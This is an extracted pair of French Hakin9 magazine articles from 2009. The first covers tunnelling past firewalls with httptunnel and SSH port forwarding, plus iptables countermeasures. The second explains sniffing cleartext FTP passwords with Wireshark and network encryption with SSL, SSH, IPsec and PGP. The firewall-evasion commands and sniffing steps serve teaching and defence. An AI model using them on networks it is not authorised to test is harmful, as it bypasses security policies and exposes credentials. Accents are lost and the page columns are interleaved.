Je vous recommande d'utiliser Firefox avec n'importe quelle extension Proxy. De cette faon vous pouvez facilement changer de configuration proxy. Vous pouvez utiliser les Proxies SOCK que vous venez de crer avec toutes les autres applications supportant ces configurations, par exemple: Skype, IRC, P2P, Navigateur. Pour vrifier que tout fonctionne correctement, procdez comme suit : Surfez sur Internet sans proxy et choisissez le mode de connexion direct partir des configurations Proxy de votre navigateur. Allez sur un site web, par exemple : http://whatismyip.com et notez son adresse ip. Ensuite, choisissez un Proxy SOCK, et entrez nouveau l'adresse IP que vous utilisez. Vous devez voir votre propre adresse IP de votre serveur sur Internet. En clair, cela signifie que votre proxy fonctionne correctement. Pour tablir une connexion au proxy vous pouvez utiliser galement : htc (client httptunnel) puis indiquer vos informations d'authentification, ou dfinir votre propre User Agent. Vous pouvez galement vos priphriques internes qui se trouvent chez vous. Il suffit de taper leur adresse IP prive dans la barre d'adresse du navigateur. Ceci a un avantage, vous n'ouvrez qu'un seul port pour les connexions entrantes et aussi pour vous connecter avec le serveur httptunel.

Figure 11. IP avec Tunneling activ

32 HAKIN9 2/2009

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 32

2009-01-05, 18:16

CONTOURNER LES FIREWALLS

2/2009 HAKIN9

33

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 33

2009-01-05, 18:17

PRATIQUE
Utilisez VNC pour une administration distance d'un poste.

Dsavantages du tunneling HTTP sans SSH

Pas de cryptage, on peut donc sniffer votre connexion ; Aucun anonymat, n'importe qui peut utiliser votre tunnel ; Aucune intgrit des informations, votre flux peut tre altr ; Avec votre tunnel http vous ne pouvez tablir qu'une connexion la fois.

Configurez VNC Server avec votre serveur externe. Les ports par dfaut pour VNC sont : 5900/TCP et 5800/TCP, vous devrez galement spcifier le numro d'affichage. J'utiliserai le numro d'affichage 64. Dans mon cas, les numros de ports sont : 5964/TCP et 5864/TCP :
htc forward-port 10001 192.168.11.240:443, putty -L 5964:127.0.0.1:5964 -X -P 10001 root@localhost

Scurit Tunnel

Il est primordial de veiller l'intgrit, l'anonymat et l'authentification lors de l'utilisation d'un tunnel HTTP & SSH.

HTTP-CONNECT

La mthode HTTP CONNECT peut tre utilise conjointement avec un proxy qui peut tabuler dynamiquement sur le mode tunnel.

(-L rediriger le port local 5964 pour votre client VNC, et autoriser la redirection vers X11 avec -X), Listing 1. Configuration SSH.

Dmarrez votre client VNC et connectez-vous :

localhost:64 (localhost: <displaynumber>).

Pour vos courriels, utilisez un Serveur SMTP

Il doit toujours y avoir un Serveur SMTP en cours d'excution lextrieur du rseau,

htc forward-port 10001 192.168.11.240:443 putty -L 666:<smtpserver>:25 -P 10001 root@localhost ,

/etc/ssh/sshd_config AllowTcpForwarding yes #Redirection TCP autorise ou non GatewayPorts yes #Les htes distants ont l'autorisation ou non de se connecter aux ports redirigs sur poste client. X11Forwarding yes #La connexion au serveur d'affichage X11 est automatiquement redirige sur le poste distant #de sorte que n'importe quel programme lanc depuis un shell (ou commande) passera par un canal #crypt. La vritable connexion au serveur X se fera depuis le poste en local. PermitTunnel yes #Support du Tunneling VPN

Configurez votre client de messagerie pour utiliser localhost:666 comme serveur de messagerie sortant.

Mesures de contre-attaque

Il y a plusieurs mesures pour chapper des contre-attaques. Voici le dcaloque : Refusez le trafic non prioritaire (Listing 2) ; Fermez les ports non ncessaires et n'excuter que les services ncessaires ; Utilisez les inspections d'tat pour viter le Tunneling ACK ; Allouez un dlai de connexion pour prvenir les Canaux Cachs de Timing ; Utilisez le filtrage de contenu ; Utilisez des HIDS et NIDS ; Utilisez des proxies aprs Authentification ; Refusez les requtes de type HTTPCONNECT ; Pensez utiliser des antivirus et antispywares ; Consultez rgulirement les fichiers log ; Surveillez attentivement le trafic suspect ; Administrez votre rseau et tablissez des statistiques sur le trafic.

Listing 2. Jeux de rgles (Ruleset) d'un Pare-feu

# refuser les paquets suspects et viter le scan des ports iptables -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP iptables -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # Mthode pour viter un Tunneling ACK, une nouvelle connexion doit tre initialise avec un drapeau SYN ON. iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP # SYN-Flood Protection iptables -N syn-flood iptables -A INPUT -p tcp --syn -j syn-flood iptables -A syn-flood -m limit --limit 1/s --limit-burst 4 -j RETURN iptables -A syn-flood -j DROP # Reject HTTP CONNECT Queries iptables -I INPUT -p tcp -d 0/0 --dport 80 -m string --string "CONNECT" -j REJECT # Nombre limite de connexions iptables -p tcp -m iplimit --iplimit-above 2 -j REJECT --reject-with tcp-res

34

HAKIN9 2/2009

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 34

2009-01-05, 18:17

CONTOURNER LES FIREWALLS

GNU C'est quoi exactement ?

GNU est un systme d'exploitation libre comprenant des applications gratuites. Le Projet GNU comprend des outils rputs comme : GCC, binutils, bash, glibc et coreutils. GNU GPL est une licence qui peut tre utilise pour les applications gratuites. L'acronyme signifie : General Public Licence (Licence Publique Gnrale) et historiquement elle a pour vocation de n'imposer aucune restriction sur lusage des programmes. Pour de plus amples informations, veuillez consulter le site : http://www.gnu.org

Sur Internet
Projet GNU : http://www.gnu.org/ Internet Assigned Numbers Authority : http://www.iana.org/ Liste des Numros de Port : http://www.iana.org/assignments/ port-numbers/ Logiciel httptunnel : http://www.nocrew.org/software/ httptunnel.html Fichiers binaires win32 httptunnel : http://www.neophob.com/ serendipity/index.php?/archives/ 85-GNU-HTTPtunnel-v3.3Windows-Binaries.htmlss.full.link RFC 2612, Hypertext Transfer Protocol HTTP/1.1 : http://www.w3.org/Protocols/rfc2616/ rfc2616.html Liste de proxies : http://multiproxy.org/ Stunnel : http://www.stunnel.org/ Ethereal, Wireshark : http://www.ethereal.com/ Snort IDS : http://www.snort.org/ OpenSSH : http://www.openssh.org/ OpenSSH pour Windows : http://sshwindows.sourceforge.net/ OpenVPN : http://openvpn.sourceforge.net/ Iptables et Netfilter : http://www.netfilter.org/ TCP/IP avec l'HTTP : http://www.htthost.com/ Tunneling DNS : http://www.dnstunnel.de/ Tunneling ICMP : http://thomer.com/icmptx/ Tunneling ACK : http://www.ntsecurity.nu/toolbox/ ackcmd/

Lgalit & Ramifications

Sachez que si vous utilisez les techniques de canaux cachs au sein de rseaux d'entreprises vous encourez des sanctions selon le pays concern. Vous devez donc connatre la politique de l'entreprise. Mais galement, connatre les risques lis l'utilisation des canaux cachs. Notez qu'il peut arriver que des entreprises tablissent des contrats mentionnant le transfert de donnes par tunneling en collaboration avec leurs partenaires. Cela permet notamment de protger la transmission d'informations sensibles.

Primtre de Scurit

Le primtre de scurit comprend : des technologies firewall, le filtrage de paquets, dtection de l'tat du rseau, proxies applicatifs, VPN (Virtual Private Network), proxies HTTP, passerelle scurise, IDS (Systme de Dtection d'Intrusion), IPS (Systme de Prvention d'Intrusions) avec bornes d'accs, passes, barrire pour vhicules, contrles de scurit (Cf. Figure 1).

Rsum

Faire du tunneling n'est finalement pas si compliqu. Il n'est pas ncessaire d'avoir beaucoup de connaissances ni de forte exprience. Lapplication httptunnel est recommande pour effectuer des tests d'intrusion. Vous pouvez cacher vos traces afin de vous protger contre n'importe quel primtre de scurit. Attention : Il existe des mthodes de dtection qui peuvent par exemple comparer le trafic http entrant et sortant.

Une rgle de scurit de base : le trafic http entrant est en rgle gnrale plus important que le sortant. Si c'est l'inverse, il se peut que ce soit du trafic cach. Autre lment : le cryptage d'un Tunnel SSL Tunnel permet de protger le trafic cach. Certains pays n'autorisent pas l'utilisation du cryptage. Vous ne serez jamais protg 100%. Il peut toujours y avoir des erreurs de configuration, des signatures inconnues, des canaux cachs voire mme

l'ignorance de l'utilisateur. Pour conclure, n'utilisez pas les techniques mentionnes ci-dessus des fins illgales. Avant toute utilisation vous devez connatre les clauses relatives aux lois du pays concern. Michael Schratt

Figure 12. Ecran d'aide d'HTC

Michael Schratt travaille dans la Scurit Rseau Oprationnelle, c'est un passionn de programmation et il a une longue exprience dans la scurit des applications Web. Son rle en entreprise est de surveiller l'ensemble des systmes informatiques et la scurit des postes Unix et Windows. Contact : mail@security-schratt.at 2/2009 HAKIN9 35

28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 35

2009-01-05, 18:17

IGNACE KAGNI KUEVIAKO

PRATIQUE Le cryptage

des communications via le rseau

Nombreux sont ceux qui dveloppent une certaine mfiance vis--vis des communications par Internet. En effet, les informations qui circulent sur la toile peuvent tre interceptes et lues par dautres personnes. Le but de cet article est de prsenter les facilits daccs aux communications sur le rseau et de donner quelques outils de cryptage des communications.

Degr de difficult

a confidentialit demeure un lment essentiel et intrinsque la scurit de toute information circulant ou non sur un rseau informatique. Et ce nest pas un hasard si elle figure en bonne place dans le fameux triangle ultra important en matire de scurit informatique savoir la Disponibilit, lIntgrit et la Confidentialit. Lmetteur dune information est naturellement cens connatre dune manire ou dune autre le ou les destinataires potentiels de son message. Et toute personne se retrouve mal laise si elle se sait espionne ou surveille par un individu malintentionn. Le cryptage est laction de rendre illisible des informations pour quiconque ne possde pas la cl de dcryptage. Parmi les mthodes dattaque, linterception de message occupe une place prpondrante.

Capture des informations

CET ARTICLE EXPLIQUE...
Les techniques de cryptage des informations envoyes entre deux postes via le rseau.

CE QU'IL FAUT SAVOIR...

Notions de base de la pile TCP/IP. Notions basiques de cryptographie. 36 HAKIN9 2/2009

Lanalyse de trafic est une discipline que beaucoup de spcialistes et hackers affectionnent particulirement. Il sagit de se servir dun logiciel pour couter et stocker les paquets du trafic et ensuite essayer de lire le contenu des communications ainsi stockes sur le disque dur. Beaucoup doutils existent pour faire cela. Et ces outils se basent la plupart du temps sur le fait que certains protocoles font transiter les informations et les commandes sous forme de texte et en clair sur le rseau. Le cas le plus typique est celui de

FTP (File Transfer Protocol). Pour sen convaincre, il suffit de mettre en place un petit rseau comme lindique le schma de la Figure 1. Considrons que lordinateur PC Alma se connecte au serveur FTP. Il suffit de lancer un sniffer comme Wireshark sur PC Pirate. On peut enregistrer la capture des paquets au format pcap afin de pouvoir les rutiliser plus tard. Une fois la capture finie on utilise les filtres adquats pour connatre les mots de passe passs en clair via les connexions FTP (ou telnet,..). Avec les options Follow TCP Stream et Follow SSL Stream il est possible de suivre entirement une connexion TCP ou SSL partir d'un seul paquet. Pour cela, il faut slectionner le paquet qui vous parat suspect, une connection FTP ou l'accs un site scuris, puis faire Analyse-> Follow TCP Stream ou Analyse->Follow SSL Stream. Wireshark va filtrer tous les paquets reus avec les adresses IP sources et destinations ainsi que les numros de ports utiliss dans le paquet slectionn. Ce qui affichera toutes les donnes changes du flux TCP entier avec des couleurs diffrentes afin de reconnatre les paquets envoys des paquets reus. Avec cette technique, lors d'une attaque MITM, le pirate pourra suivre entirement une connexion un site web par exemple, rcuprer les pages affiches, les donnes envoyes, de mme pour les donnes cryptes. La Figure 2 montre une interface de Ethereal qui est pratiquement la mme que celle de

36_37_38_39_40_41_42_43_Cryptage.indd

36

2009-01-05, 18:18

TECHNIQUES DE CRYPTAGE
Wireshark. Vous pouvez y voir quelques paquets FTP capturs. La figure 3 prsente linterface de Wireshark/Ethereal qui permet de slectionner le protocole filtrer ainsi que le port. Et dans le cas de FTP, les mots de passe ainsi que toutes les communications apparaissent clairement et sans aucune ambigut. Sil sagit dun rseau partag donc prsence dun HUB sur le rseau, alors Wireshark suffit pour sniffer et dchiffrer le contenu. Mais sil sagit dun rseau commut avec un switch, il faudra mettre en place un MAC flooding (moins efficace) ou un ARP spoofing (plus efficace) Tableau 1. Le modle OSI et la cryptographie OSI 7 Application 6 Prsentation 5 Session 4 Transport Transport UDP, TCP SSL, PCT, STLP, TLS SSH-Trans IPSec-Transport IPsec IP MPLS couche 3 (BGP) L2TP L2F, PPTP MPLS Couche 2 Cryptage niveau hard TCP/IP Application http, ftp, telnet, Protocoles PGP, GnuPG, SET, S-HTTP, S/MIME Socks, SSH-User

3 Rseau 2 Liaison de donnes 1 Physique

Interconnexion de rseau IP ICMP Interface rseau Ethernet, Frame Relay, ATM, PPP,

Protocoles et implmentations cryptographiques

Tableau 2. Protocoles issus dune combinaison avec SSL Protocole scuris avec SSL https smtps nntps sshell ldaps ftps-data ftps telnets imaps ircs pop3s dun certificat lectronique, dun serveur de messagerie S/MIME, et dun client de messagerie S/MIME. S/MIME assure : lIntgrit : utilisation dune fonction de calcul du digest et cryptage avec la cl prive. lAuthentification : base sur lutilisation de la cl prive du certificat lectronique la Non rpudiation : ralisation dune signature lectronique Listing 1. Cl publique PGP
-----BEGIN PGP PUBLIC KEY BLOCK----Version: GnuPG v1.0.6 (GNU/Linux) pQGiBDm+tJYRBACyoHzCRdJXXXFai0bENERmPYFQwx9gOWm7kZRnD27tzLjuQVWt oFgooN/li04QIAn0o6fXolGIbPH//x4QstrZDVqxC8iEwEghHkjfJJM8GBECAAwF Ajm+dL0FCQPCZwAACgkQvatgyKeVS0gbuwCePu5P6uEzIeOKtXGVOoCZB1C8yPkA oJFot6R8KbweB58KBR4fCihwKhKa =fytL -----END PGP PUBLIC KEY BLOCK-----

Numro de port 443/tcp 465/tcp 563/tcp 614/tcp 636/tcp 989/tcp 990/tcp 992/tcp 993/tcp 994/tcp 995/tcp la Confidentialit : (cryptage symtrique) lexpditeur envoie au destinataire la cl de chiffrement crypte par la cl publique de ce dernier.

Les banques font partie des premiers utilisateurs de systmes de cryptographie. Les cartes bancaires possdent trois niveaux de scurit : le code confidentiel, la signature RSA et l'authentification DES. Dun autre ct, les navigateurs Web, ou browsers, tels que Mozilla Firefox ou Internet Explorer, utilisent le protocole de scurit SSL (Secure Sockets Layers), qui repose sur un procd de cryptographie par cl publique : le RSA. Il existe une correspondance entre le modle OSI et les standards de cryptage. Ceci est illustr dans le Tableau 1. Dans cette section, nous aborderons les diffrents protocoles de cryptage de communication tels que PEM, MOSS, S/MIME, PGP, SSL/TLS, SSH, S-http, SET, IPSec .

PEM/MOSS
Pem : Privacy Enhanced Mail est un protocole scuris de messagerie numrique qui utilise les certificats numriques grs par une Autorit de certification. MOSS : MIME Object Security Services, est un remplacement de PEM qui nutilise pas les certificats numriques grs par une AC, il fournit une association entre adresses email et les certificats et permet lchange scuris des fichiers attachs.

PGP
PGP est un systme de cryptographie hybride, utilisant une combinaison des fonctionnalits de la cryptographie cl publique et de la cryptographie symtrique.

S/MIME
S/MIME : est une version scurise du MIME. Lutilisation de S/MIME ncessite la prsence

2/2009 HAKIN9

37

36_37_38_39_40_41_42_43_Cryptage.indd

37

2009-01-05, 18:18

PRATIQUE
Lorsqu'un utilisateur chiffre un texte avec PGP, les donnes sont dabord compresses. Cette compression des donnes permet de rduire le temps de transmission par tout moyen de communication, d'conomiser l'espace disque et, surtout, de renforcer la scurit cryptographique. La plupart des cryptanalystes exploitent les modles trouvs dans le texte en clair pour casser le chiffrement. La compression rduit ces modles dans le texte en clair, amliorant par consquent considrablement la rsistance la cryptanalyse. Ensuite, l'opration de chiffrement se fait principalement en deux tapes : PGP cre une cl secrte IDEA de manire alatoire, et chiffre les donnes avec cette cl. Ensuite, PGP crypte la cl secrte IDEA et la transmet au moyen de la cl RSA publique du destinataire. L'opration de dcryptage se fait galement en deux tapes : PGP dchiffre la cl secrte IDEA au moyen de la cl RSA prive. PGP dchiffre les donnes avec la cl secrte IDEA prcdemment obtenue. que le serveur ou le client ne peut lire les informations transitant sur le rseau). Il n'est donc pas possible d'couter le rseau l'aide d'un analyseur de trames. Le client et le serveur s'authentifient mutuellement afin d'assurer que les deux machines qui communiquent sont bien celles que chacune des parties croit tre. Il n'est donc plus possible pour un pirate d'usurper l'identit du client ou du serveur (spoofing). La version 1 du protocole (SSH1) propose ds 1995 avait pour but de servir d'alternative aux sessions interactives (shells) telles que Telnet, rsh, rlogin et rexec. Ce protocole possdait toutefois une faille permettant un pirate d'insrer des donnes dans le flux chiffr. C'est la raison pour laquelle en 1997 la version 2 du protocole (SSH2) a t propose en tant que document de travail (draft) l'IETF. Les documents dfinissant le protocole sont accessibles en ligne sur http://www.ietf.org/ html.charters/secsh-charter.html. Secure Shell Version 2 propose galement une solution de transfert de fichiers scuris (SFTP, Secure File Transfer Protocol).

Exemple dune connexion scurise aux serveurs SSH

On peut se servir de loutil Putty tlchargeable gratuitement depuis lURL suivant : http://www.chiark.greenend.org.uk/ ~sgtatham/putty/download.html. Maintenant nous allons passer la prsentation des protocoles S-http, SET et IPSec.

SSL/TLS (Secured Socket Layer/ Transport Layer Security)

Conu au dbut par Netscape, le protocole SSL fournit une communication scurise au niveau transport et utilise des certificats pour identifier chaque extrmit (le serveur, et parfois le client). Il est bas sur les algorithmes RSA. TLS est un remplacement de SSL et il est bas sur SSLv3. Il comporte moins de problmes lgaux puisquil ne dpend pas des algorithmes dposs par RSA. Grce SSL/TLS beaucoup dautres protocoles ont t mis au point (voir le Tableau 2). Figure 1. Un rseau de test

SSH
Le protocole SSH (Secure Shell) a t mis au point en 1995 par le Finlandais Tatu Ylnen. Il s'agit d'un protocole permettant un client (un utilisateur ou bien mme une machine) d'ouvrir une session interactive sur une machine distante (serveur) afin d'envoyer des commandes ou des fichiers de manire scurise. Les donnes circulant entre le client et le serveur sont chiffres, ce qui garantit leur confidentialit (personne d'autre
38 HAKIN9 2/2009

Figure 2. Ethereal (ancienne version de Wireshark)

36_37_38_39_40_41_42_43_Cryptage.indd

38

2009-01-05, 18:18

TECHNIQUES DE CRYPTAGE
S-http
Contrairement SSL qui travaille au niveau de la couche de transport, S-HTTP procure une scurit base sur des messages au-dessus du protocole HTTP, en marquant individuellement les documents HTML l'aide de certificats. Alors que SSL est indpendant de l'application utilise et chiffre l'intgralit de la communication, S-HTTP est trs fortement li au protocole HTTP et chiffre individuellement chaque message. Les messages S-HTTP sont bass sur trois composantes : le message HTTP, les prfrences cryptographiques de l'envoyeur et les prfrences du destinataire. Ainsi, pour dcrypter un message S-HTTP, le destinataire du message analyse les en-ttes du message afin de dterminer le type de mthode qui a t utilis pour crypter le message. Puis, grce ses prfrences cryptographiques actuelles et prcdentes, et aux prfrences cryptographiques prcdentes de l'expditeur, il est capable de dchiffrer le message. modle OSI) utilisant des algorithmes permettant le transport de donnes scurises sur un rseau IP. Son objectif est d'authentifier et de chiffrer les donnes : le flux ne pourra tre comprhensible que par le destinataire final (chiffrement) et la modification des donnes par des intermdiaires ne pourra tre possible (intgrit). IPsec est souvent un composant de VPN, il est l'origine de son aspect scurit (canal scuris ou tunneling). La mise en place d'une architecture scurise base d'IPsec est dtaille dans la RFC

Figure 3. Interface de slection des protocoles filtrer

SET
SET (Secure Electronic Transaction) est un protocole de scurisation des transactions lectroniques mis au point par Visa et MasterCard, et s'appuyant sur le standard SSL. SET est bas sur l'utilisation d'une signature lectronique au niveau de l'acheteur et une transaction mettant en jeu non seulement l'acheteur et le vendeur, mais aussi leurs banques respectives. Lors d'une transaction scurise avec SET, les donnes sont envoyes par le client au serveur du vendeur, mais ce dernier ne rcupre que la commande. En effet, le numro de carte bleue est envoy directement la banque du commerant, qui va tre en mesure de lire les coordonnes bancaires de l'acheteur, et donc de contacter sa banque afin de les vrifier en temps rel. Ce type de mthode ncessite une signature lectronique au niveau de l'utilisateur de la carte afin de certifier qu'il s'agit bien du possesseur de cette carte.

IPSec
IPSec (Internet Protocol Security) est un ensemble de protocoles (couche 3

Figure 4. Interface de Putty

2/2009 HAKIN9 39

36_37_38_39_40_41_42_43_Cryptage.indd

39

2009-01-05, 18:18

PRATIQUE
2401. Il dispose de deux modes : le mode transport et le mode tunnel.

Scurisation des communications lintrieur dun rseau Windows 2008 avec IPsec

Cet exemple montre que IPsec permet de chiffrer les communications du rseau (confidentialit) et/ou de garantir que lordinateur ou le serveur avec lequel vous tes en train de dialoguer est bien celui quil prtend tre (authenticit), et ce de manire transparente pour lutilisateur. Il faut dans un premier temps, crer un objet GPO parce quil est plus pratique et logique dappliquer les paramtres IPsec lensemble du rseau, ou au moins un site/domaine/OU, plutt que de le faire poste poste (on utilise donc les GPO). Ensuite, il faut paramtrer cet objet. Une fois ceci fait, il faut mettre jour les GPO au niveau des autres ordinateurs du rseau, afin quils puissent communiquer de faon crypte avec le premier ordinateur configur.

se trouve dans une situation correspondant, il applique alors la rgle de scurit. Loption Exemption dauthentification permet de ne pas soumettre certains ordinateurs la rgle de scurit, typiquement des ordinateurs qui doivent communiquer avant quils ne puissent stre authentifis ou des ordinateurs qui ne peuvent pas utiliser le type dauthentification configur dans la rgle de scurit. Loption Serveur Serveur permet dauthentifier les communications entre des adresses IP ou des ensembles

dadresses spcifiques. Loption Tunnel sert la configuration de tunnels IPsec pour les passerelles VPN. Loption Personnalise enfin permet, comme son nom lindique, de configurer une rgle de scurit qui ncessite des paramtres spcifiques. Laissez le choix par dfaut (Isolation) puis cliquez sur Suivant

Configuration requise
Demander lauthentification des connexions entrantes et sortantes permet dtablir

Cration de la GPO (Objet de stratgie de groupe)

Avec Windows 2008, ouvrez la console Gestion de Stratgie de groupe (disponible dans les Outils dadministration). Ensuite fates un clic-droit sur le nom du domaine, site o lon souhaite dployer la GPO puis slectionnez Crer un objet GPO dans ce domaine et le lier ici. Pour finir, indiquez le nom Rgles de scurit des connexions et validez par OK.

Figure 5. Gestion de stratgie de groupe

Paramtrage de la GPO
Toujours dans le mme environnement, fates un clic-droit sur lobjet de stratgie de groupe ainsi cr, puis slectionnez Modifier. Dployez ensuite larborescence Configuration de lordinateur > Stratgies > Paramtres Windows > Paramtres de scurit > Pare-feu Windows avec fonctions avances de scurit. Fates un clic-droit sur Rgles de scurit de connexion et slectionnez Nouvelle rgle.

Type de rgle
Il reste maintenant dfinir le type de rgle appliquer. Il y a plusieurs options. Loption Isolation permet de traiter tout le trafic pour un profil rseau donn. Lorsque lordinateur
40 HAKIN9 2/2009

Figure 6. Assistant Nouvelle rgle de scurit de connexion

36_37_38_39_40_41_42_43_Cryptage.indd

40

2009-01-05, 18:18

TECHNIQUES DE CRYPTAGE
une communication scurise si les deux ordinateurs le permettent ; sinon elle stablit normalement de faon non scurise. Il faut laisser le choix par dfaut qui est Demander lauthentification des connexions entrantes et sortantes puis cliquer sur Suivant. Pare-feu Windows avec fonctionnalits avances et slectionnez Proprits. Dans longlet Paramtres IPsec, dans le champ Exemptions IPsec indiquez Oui dans le menu droulant (cela permet dautoriser les requtes de type ICMP telles que ping circuler mme si la communication scurise IPsec ne peut tre tablie, ce qui peut savrer trs utile pour diagnostiquer des problmes rseau), puis cliquez sur le bouton Personnaliser dans le champ Valeurs par dfaut IPsec. Dans lencadr Protection des donnes (mode rapide), slectionnez Avanc puis cliquez sur Personnaliser. Dans la fentre Personnaliser les paramtres de protection des donnes, cochez Demander le chiffrement de toutes les rgles de scurit de connexion qui utilisent ces paramtres puis cliquez sur OK : ainsi les communications seront chiffres en plus dtre authentifies. Dans la fentre Personnaliser les paramtres IPsec, cliquez nouveau sur OK, ainsi que dans la fentre de Proprits Parefeu Windows avec fonctions avances. Fermer la console Gestion de stratgie de groupe. Nous allons prsent vrifier

Mthode dauthentification
Loption Par dfaut utilise la mthode dauthentification spcifie dans les proprits du profil (Onglet IPsec des proprits de Pare-feu Windows avec fonctions avances de scurit). Loption Ordinateur et Utilisateur vrifie qu la fois lordinateur et lutilisateur qui tentent de communiquer avec le rseau sont authentifis sur le domaine ou sur un domaine li par une relation dapprobation. Loption Ordinateur vrifie que lordinateur qui tente de communiquer avec le rseau est authentifi sur le domaine ou sur un domaine li par une relation dapprobation. Loption Certificat dordinateur permet un ordinateur non authentifi sur le domaine de communiquer avec le rseau sil est muni dun certificat mis par lautorit de certification spcifie. Laissez le choix par dfaut (Par dfaut) puis cliquez sur Suivant .

Figure 7. Proprits de Pare-feu Windows avec fonctions avances de scurit le bon fonctionnement du systme prcdemment mis en place.

Mise jour des GPO

Sur les autres ordinateurs, il faut excuter gpupdate de la manire suivante : Dans le menu Dmarrer, cliquer sur Invite de commandes puis dans lInvite de commandes taper gpupdate et valider par Entre. Lorsque la mise jour est effectue, fermer lInvite de commandes.

Accs un autre ordinateur

Depuis un ordinateur sur lequel la mise jour des GPO est effectue, accder un autre par exemple en ouvrant ses

Profil
La page profil permet de slectionner quels profils sappliquera la rgle. Loption Domaine sapplique lorsquun ordinateur concern par la rgle est connect un rseau local sur lequel rside son compte de domaine (i.e. lorsque lordinateur est connect au sein de lentreprise). Loption Prives sapplique lorsquun ordinateur est connect un rseau partir duquel le compte de domaine nest pas joignable (i.e. au domicile de lutilisateur). Loption Publiques sapplique lorsquun ordinateur est connect au domaine depuis une connexion publique (aroport, cybercaf) Laissez les 3 cases coches par dfaut, puis cliquez sur Suivant. Ensuite, indiquez le Nom Demander lauthentification des connexions et cliquez sur Terminer.

Figure 8. Cryptage PGP

Paramtrer le chiffrage des communications

Il faut ce niveau dfinir clairement les paramtres de cryptage des communications. Fates un clic-droit sur

Figure 9. Dcryptage PGP

2/2009 HAKIN9 41

36_37_38_39_40_41_42_43_Cryptage.indd

41

2009-01-05, 18:18

PRATIQUE
rsistance la cryptanalyse. Toutefois, la compression est impossible sur les fichiers de taille insuffisante ou supportant mal ce processus. PGP cre ensuite une cl de session qui est une cl secrte usage unique. Cette cl correspond un nombre alatoire, gnr par les dplacements alatoires de votre souris et les squences de frappes de touches. Pour crypter le texte en clair, cette cl de session utilise un algorithme de cryptage conventionnel rapide et scuris. Une fois les donnes codes, la cl de session est crypte vers la cl publique du destinataire. Cette cl de session crypte par cl publique est transmise avec le texte chiffr au destinataire. Le processus de dcryptage est inverse. La copie de PGP du destinataire utilise sa cl prive pour rcuprer la cl de session temporaire qui permettra ensuite de dcrypter le texte crypt de manire conventionnelle. Il est important de tlcharger et installer OpenPGP. Pour installer OpenPGP sous Windows, vous pouvez le tlcharger de site : GPG : GNU Privacy Guard ftp:// lcsweb.net/pub/winpt/winpt-0.5.13installer.exe (WinPT + GPG). Cette version accepte des plug-ins automatiques pour les e-mails. Elle est compatible avec PGP 6, 7, 8 et est gratuite, et librement adaptable/modifiable par les entreprises ou les particuliers (licence GNU GPL) PGP : Pretty Good Privacy PGPfreeware 8.0 http://www.pgp.com/ Cette version est payante pour les entreprises et les professions librales. Elle ne supporte pas de plug-in automatique pour les e-mails mme si elle est conviviale.

Voici les adresses depuis lesquelles nous pouvons tlcharger OpenPGP pour MacOS X : MacGPG (Mac GNU Privacy Guard) http://macgpg.sourceforge.net/fr/ index.html (divers logiciels installer). Elle accepte aussi des plug-ins automatiques pour les e-mails elle est compatible avec PGP 6, 7, 8 gratuite et librement adaptable/ modifiable par les entreprises et les particuliers (licence GNU GPL) PGP : Pretty Good Privacy PGPfreeware 8.0 http://www.pgp.com/ : Il sagit de la version payante pour MAC Aucun plug-in automatique nest utilis pour les e-mails

Figure 10. Gnration de cls

partages : Dans la Barre de recherche accessible via le menu dmarrer, tapez \nomdelordinateur. Ses partages souvrent.

Vrification des communications

Ouvrez la console Pare-feu Windows avec fonctions avances de scurit, accessible via le menu Dmarrer > Outils dadministration. Dployez larborescence Analyse > Associations de scurit > Mode principal. Une ligne indiquant ladresse IP de lordinateur source, celle de lordinateur cible, la mthode dauthentification, le type de chiffrement et dintgrit doit apparaitre. Il faut vrifier quelle est bien conforme aux paramtres rentrs tout au long de la configuration.

OpenPGP est disponible pour Linux. GnuPG. Il est prinstall par dfaut dans toutes les distributions Linux. Le tlchargement peut aussi se faire partir des sites web des distributions.

Crypter vos mails avec PGP

PGP est une combinaison des meilleures fonctionnalits de la cryptographie de cl publique et de la cryptographie conventionnelle. PGP est un systme de cryptographie hybride. Lorsqu'un utilisateur crypte du texte en clair avec PGP, ces donnes sont d'abord compresses. Cette compression des donnes permet de rduire le temps de transmission par modem, d'conomiser l'espace disque et, surtout, de renforcer la scurit cryptographique. La plupart des cryptanalystes exploitent les modles trouvs dans le texte en clair pour casser le chiffrement. La compression rduit ces modles dans le texte en clair, amliorant par consquent considrablement la
42 HAKIN9 2/2009

Figure 11. Cryptage de mail

36_37_38_39_40_41_42_43_Cryptage.indd

42

2009-01-05, 18:19

TECHNIQUES DE CRYPTAGE
Mise en place des cls PGP

Lutilisation de OpenPGP ncessite que lon cre sa propre paire de cls et que lon se procure la cl publique de ses correspondants. On suit donc quatre tapes savoir : la gnration de sa paire de cls, lexportation de la cl publique et lenvoi dune copie de cette cl publique aux correspondants potentiels et finalement limportation de la cl publique des correspondants. Concernant la gnration de la paire de cls, il faut remarquer que GPG ou PGP proposent de gnrer votre paire de cls lors du premier lancement. Et cette paire de cls est normalement unique, et on peut la conserver durant des annes. Cette paire de cls contient une cl publique et une cl prive : la cl publique gnre constitue le cadenas qui permettra vos correspondants de crypter les e-mails qu'ils vous envoient. GPG et PGP permettent l'exportation de votre cl publique par leur fonction export . Vos correspondants doivent avoir une copie de votre cl publique PGP, qui ressemblera un peu au Listing 1.

Sur Internet
